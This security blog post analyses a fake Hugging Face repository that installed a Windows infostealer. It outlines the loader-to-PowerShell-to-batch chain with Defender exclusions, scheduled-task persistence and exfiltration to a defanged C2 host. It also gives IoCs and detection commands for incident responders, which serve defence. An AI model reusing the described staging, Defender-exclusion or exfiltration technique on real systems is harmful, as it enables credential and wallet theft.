Listen to this Post

Introduction:
The AI community’s trust in open-source model repositories has been weaponized. A malicious repository, “Open-OSS/privacy-filter,” impersonating OpenAI’s legitimate privacy tool, surged to the number one trending spot on Hugging Face, racking up over 200,000 downloads before its removal. Behind its convincing facade lay a sophisticated, multi-stage infostealer designed to silently exfiltrate browser credentials, cryptocurrency wallets, SSH keys, and more from every Windows machine it touched.
Learning Objectives:
- Analyze the complete six-stage attack chain of the Open-OSS/privacy-filter malware, from initial execution to data exfiltration.
- Identify Indicators of Compromise (IoCs) and learn how to detect similar supply chain threats in AI repositories.
- Implement practical defensive measures, including system isolation, credential rotation, and advanced detection commands for Windows environments.
You Should Know:
- Anatomy of the Attack: A Six-Stage Infection Chain
The attack began with a seemingly legitimate model card instructing users to clone the repository and execute a file. On Windows, the `loader.py` script initiated a covert, multi-stage process.
Step‑by‑step guide:
1. Initial Execution:
The malicious `loader.py` called `verify_checksum_integrity()` which disabled SSL verification and fetched a JSON from jsonkeeper[.]com
SSL verification was disabled (verify=False), allowing the script to fetch a JSON payload without security warnings.
2. PowerShell Payload Retrieval:
The JSON contained a `cmd` field passed directly to PowerShell:
powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -Command "..."
This downloaded a batch file called `update.bat` from `api.eth-fastscan[.]org` (a domain mimicking a legitimate service).
3. Batch File Execution:
The batch file performed critical malicious actions:
- Checked for administrative privileges.
- Added Microsoft Defender exclusions for the directories where the final payload would be dropped.
- Downloaded the final 10 MB Rust-based infostealer payload.
- Created a scheduled task named `MicrosoftEdgeUpdateTaskCore` for persistence.
4. Evasion & Execution:
The final infostealer incorporated extensive anti-analysis techniques. It detected debuggers, sandboxes, and virtual machines (VirtualBox, VMware, Hyper-V, Parallels), halting execution if found.
5. Data Collection:
Once active, the malware launched eight parallel modules to stealthily collect:
– Chrome & Firefox login data, cookies, and session tokens.
– SSH keys, VPN configurations, and FTP credentials.
– Cryptocurrency wallet files.
– Screenshots of the user’s desktop.
6. Exfiltration:
All stolen data was compressed and sent to a command-and-control (C2) server at `recargapopular[.]com` via a POST request with a Bearer token authorization header.
2. IR Checklist: Immediate Actions for Compromised Systems
If you or your team downloaded or cloned the `Open-OSS/privacy-filter` repository (or any related IoCs listed below), assume complete compromise.
Step‑by‑step guide:
- Network Isolation: Immediately disconnect the affected host from the network to prevent further data exfiltration and C2 communication.
- Forensic Capture: Preserve a forensic image of the system’s memory and disk for later analysis.
- Credential Apocalypse: Rotate every credential stored in browsers, password managers, or any other credential store on that machine. Revoke all cloud provider API tokens and SSH keys that were present.
- Defender Exclusion Audit: Check for unauthorized Microsoft Defender exclusions added by the malware. Open an elevated PowerShell and run:
Get-MpPreference | Select-Object -ExpandProperty ExclusionPath
Remove any suspicious exclusions using:
Remove-MpPreference -ExclusionPath "<suspicious_path>"
5. Scheduled Task Analysis: List all scheduled tasks created in the last 7 days to identify the `MicrosoftEdgeUpdateTaskCore` persistence mechanism or other anomalies.
Get-ScheduledTask | Where-Object {$_.Date -gt (Get-Date).AddDays(-7)} | Format-Table
6. Complete Reimaging: Wipe and reinstall the operating system. Do not rely on malware removal tools alone, as the full extent of the backdoor cannot be guaranteed.
- Indicators of Compromise (IoCs): Your Threat Hunting Checklist
Use the following IoCs to hunt for this specific threat across your enterprise. All IP addresses and domains are intentionally defanged for safety.
| Type | Value |
| | — |
| Repositories | `Open-OSS/privacy-filter` (and 6 others uploaded April 24, 2025, by same actor) |
| Loader URL (JSON) | `jsonkeeper[.]com` |
| Download Domain | `api.eth-fastscan[.]org` |
| C2 Server | `recargapopular[.]com` |
| PowerShell | Command with `-ExecutionPolicy Bypass` fetching from the above domains |
| Scheduled Task | `MicrosoftEdgeUpdateTaskCore` |
Log analysis queries (Splunk/KQL) should search for network connections to these domains and processes spawning `powershell.exe` with the `-ExecutionPolicy Bypass` flag.
4. Command-Line Detection: Uncovering the Malware’s Footprints
Proactive hunting for similar attack patterns requires specific command-line skills. Here are essential commands for any security analyst’s toolkit.
Detecting PowerShell Abuse:
Search the Windows Event Logs (Event ID 4104) for PowerShell scripts that disable security controls.
Get-WinEvent -FilterHashtable @{LogName='Microsoft-Windows-PowerShell/Operational'; ID=4104} | Where-Object {$<em>.Message -match "ExecutionPolicy Bypass" -or $</em>.Message -match "WindowStyle Hidden"}
Finding Base64 Encoded Payloads in Scripts:
Attackers often use Base64 encoding to hide their commands. Use this Python one-liner to scan a suspicious script for potential Base64 payloads:
python -c "import re, base64; [print(base64.b64decode(s).decode('utf-8', errors='ignore')) for s in re.findall(r'[A-Za-z0-9+/]{40,}={0,2}', open('suspicious_file.ps1').read())]"
This decodes any long Base64 strings found in a file and prints the output, often revealing the true malicious command.
Monitoring Exfiltration Traffic:
Monitor outbound POST requests to suspicious domains using `curl` or Invoke-WebRequest. Look for large, unexpected data transfers to non-standard ports.
On a Linux proxy or gateway, monitor for large POST requests sudo tcpdump -i eth0 'tcp port 443 and (tcp[((tcp[12:1] & 0xf0) >> 2):4] = 0x504f5354)' -A
(Note: This advanced filter looks for the hex pattern 0x504f5354, which corresponds to “POST”.)
- Securing the AI Supply Chain: From Public Repos to Production
This attack underscores a critical vulnerability: the blind trust placed in public AI model repositories. To prevent a similar incident, integrate security into your machine learning operations (MLOps) pipeline.
Implementing a Secure AI Pipeline:
- Use a Private Registry: Never pull models directly from Hugging Face into a production environment. Instead, use a private, scanned registry (e.g., using tools like `jfrog` or
cloudsmith) to act as a sanitized buffer. - Automated Pre-Deployment Scanning: Before any model is approved for use, scan it with static analysis tools designed for ML artifacts. Tools like `ModelAudit` can flag unsafe loading behaviors without executing the model. `Mithridatium` is another research-driven tool specifically designed to detect backdoors and data poisoning in pretrained models.
- Enforce Cryptographic Signing and Verifiable Provenance: Only allow models that have been cryptographically signed by a trusted authority and have a verifiable, non-tampered provenance. This ensures the model you scanned is the model you deploy.
- Sandbox Execution: If a model or its associated scripts must be run, do so within an isolated, ephemeral sandbox environment (e.g., a container with no network access to internal resources and strict egress controls). This contains the blast radius of any potential compromise.
-
Tooling Up: Automating The Hunt for Rogue AI
Manual checks are insufficient at scale. Security teams should adopt specialized tools to continuously monitor for threats from AI model hubs.
Essential Tools & Commands:
– `pickle-scan` (Check for Unsafe Deserialization): Many ML models use Python’s `pickle` format, which is notoriously unsafe. Run this on any downloaded `.pkl` or `.bin` file.
pip install picklescan picklescan malicious_model.bin
– `Kingfisher` (Leaked Credential Detection): This tool from MongoDB scans codebases and developer platforms (including Hugging Face) for accidentally leaked credentials, which are a common target for these infostealers.
– Check- Git- ML- Repo- Analyzer (Identify Fake Projects): A quick tool to analyze a Git repository and detect if it is a fake ML training repo that is simply an API wrapper, a common sign of a scam or malicious project.
What Undercode Say:
- This supply chain attack succeeded by weaponizing platform popularity metrics. The repository used artificial inflation of downloads and likes to reach the trending list, manipulating trust through social proof. Always verify the reputation and history of the uploader account, not just the download count.
- The multi-stage, evasive nature of the malware (anti-sandboxing, disabling Defender, using scheduled tasks) demonstrates a professional-grade threat actor. This was not a script kiddie operation but a coordinated campaign targeting the entire open-source AI community.
- The incident is a clear signal that the “move fast and break things” culture of AI development must now include security as a non-negotiable pillar. Implementing a secure software supply chain (SSC) framework for AI artifacts is no longer optional.
Prediction:
This attack is the opening salvo in a new wave of supply chain attacks targeting the AI ecosystem. Attackers will increasingly shift from open-source libraries to AI model hubs, crafting more sophisticated, model-specific payloads (e.g., backdoored model weights, poisoned training data) that are harder to detect with traditional security tools. The integration of package and model registries into CI/CD pipelines will become a primary vector for enterprise-wide compromise, forcing a complete re-evaluation of how AI artifacts are vetted and deployed.
▶️ Related Video (80% Match):
🎯Let’s Practice For Free:
IT/Security Reporter URL:
Reported By: Tushar Subhra – Hackers Feeds
Extra Hub: Undercode MoN
Basic Verification: Pass ✅


